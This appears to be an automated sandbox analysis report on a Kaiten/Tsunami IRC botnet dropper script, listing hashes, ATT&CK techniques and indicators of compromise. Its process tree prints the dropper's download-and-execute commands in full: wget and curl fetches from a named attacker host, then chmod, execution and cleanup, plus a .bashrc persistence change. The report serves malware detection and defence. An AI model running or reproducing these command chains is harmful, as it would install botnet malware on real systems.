kaiten | 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

Analysis

max time kernel
54s
max time network
68s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
23-10-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Size

3KB
MD5

cf70ee36f1e9247f2146e4981924d4f4
SHA1

7eabae4200118c4e89979658db6e4d905fe3dae9
SHA256

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
SHA512

60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Score

10^/10

kaiten botnet defense_evasion discovery persistence privilege_escalation

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 2 IoCs

Processes:

resource	yara_rule
/tmp/m3cr0	family_kaiten2
/tmp/zigaarch64	family_kaiten2

Detects Kaiten/Tsunami payload 2 IoCs

Processes:

resource	yara_rule
/tmp/m3cr0	family_kaiten
/tmp/zigaarch64	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmod

pid process

741 chmod
778 chmod
788 chmod
829 chmod
Executes dropped EXE 4 IoCs

Processes:

m3cr0zigaarch64x00xm3cr0

ioc pid process

/tmp/m3cr0 744 m3cr0
/tmp/zigaarch64 779 zigaarch64
/tmp/x00x 789 x00x
/tmp/m3cr0 830 m3cr0
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
persistence privilege_escalation defense_evasion

Path Interception by PATH Environment Variable
T1574.007

Processes:

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description ioc process

File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Modifies Bash startup script 2 TTPs 1 IoCs
persistence

Boot or Logon Autostart Execution
T1547

Unix Shell Configuration Modification
T1546.004

Processes:

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description ioc process

File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

pid	process
741	chmod
778	chmod
788	chmod
829	chmod

ioc	pid	process
/tmp/m3cr0	744	m3cr0
/tmp/zigaarch64	779	zigaarch64
/tmp/x00x	789	x00x
/tmp/m3cr0	830	m3cr0

description	ioc	process
File opened for modification	/root/.bashrc	0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description	ioc	process
File opened for modification	/root/.bashrc	0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

Reads runtime system information 5 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlwgetcurlwgetwgetwgetcurlwget

description	ioc	process
File opened for modification	/tmp/x00x	curl
File opened for modification	/tmp/bash.sh	curl
File opened for modification	/tmp/m3cr0	curl
File opened for modification	/tmp/zigaarch64	wget
File opened for modification	/tmp/zigaarch64	curl
File opened for modification	/tmp/x00x	wget
File opened for modification	/tmp/m3cr0	wget
File opened for modification	/tmp/m3cr0	wget
File opened for modification	/tmp/m3cr0	curl
File opened for modification	/tmp/bash.sh	wget

/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
PID:690
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
  2⤵
  - Writes file to tmp directory
  PID:694
- /usr/bin/curl
  curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:718
- /bin/chmod
  chmod +x m3cr0
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/m3cr0
  ./m3cr0
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm -rf m3cr0
  2⤵
  PID:763
- /bin/rm
  rm -rf m3cr0.1
  2⤵
  PID:764
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64
  2⤵
  - Writes file to tmp directory
  PID:767
- /usr/bin/curl
  curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x zigaarch64
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/zigaarch64
  ./zigaarch64
  2⤵
  - Executes dropped EXE
  PID:779
- /bin/rm
  rm -rf zigaarch64
  2⤵
  PID:781
- /bin/rm
  rm -rf zigaarch64.1
  2⤵
  PID:782
- /usr/bin/wget
  wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x
  2⤵
  - Writes file to tmp directory
  PID:783
- /usr/bin/curl
  curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:784
- /bin/chmod
  chmod +x x00x
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/x00x
  ./x00x
  2⤵
  - Executes dropped EXE
  PID:789
- /bin/rm
  rm -rf x00x
  2⤵
  PID:793
- /bin/rm
  rm -rf x00x.1
  2⤵
  PID:794
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/bash.sh
  2⤵
  - Writes file to tmp directory
  PID:795
- /usr/bin/curl
  curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/rm
  rm -rf bash.sh.1
  2⤵
  PID:815
- /bin/bash
  bash bash.sh
  2⤵
  PID:814
- - /usr/bin/wget
    wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
    3⤵
    - Writes file to tmp directory
    PID:816
- - /usr/bin/curl
    curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:827
- - /bin/chmod
    chmod +x m3cr0
    3⤵
    - File and Directory Permissions Modification
    PID:829
- - /tmp/m3cr0
    ./m3cr0
    3⤵
    - Executes dropped EXE
    PID:830
- - /bin/rm
    rm -rf m3cr0
    3⤵
    PID:832
- - /bin/rm
    rm -rf m3cr0.1
    3⤵
    PID:833
- - /bin/sleep
    sleep 6000
    3⤵
    PID:834

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/m3cr0

Filesize
983KB

MD5
75c00b238bd8105414cbb5d08601ca1a

SHA1
2a5e59555f348bfd9fa9fc4e3e04338ee4e74576

SHA256
edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361

SHA512
a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

Download Submit
/tmp/x00x

Filesize
454KB

MD5
329c40f5253efe5909214b73f9ee0085

SHA1
85c0fd22c8a1f860fe047980dc4f94a5ec48278d

SHA256
a166155f1f60f411e71db6a34a38de4e5141e1efcb3a7180d215cf4789fe3106

SHA512
9bc97d97b3f708799045811f09f6f159de8ef4a792801528b88e977a67546be0ee52726c71272e07fa510638adc7365a5d174e3ef9f3da54b13868363c0ed873

Download Submit
/tmp/zigaarch64

Filesize
73KB

MD5
48ea3c3566c796e4f74e8e3d6df15cd3

SHA1
b1ef1574ced09471c26a4c749d5a4ab5ba7942cd

SHA256
79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a

SHA512
cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

Download Submit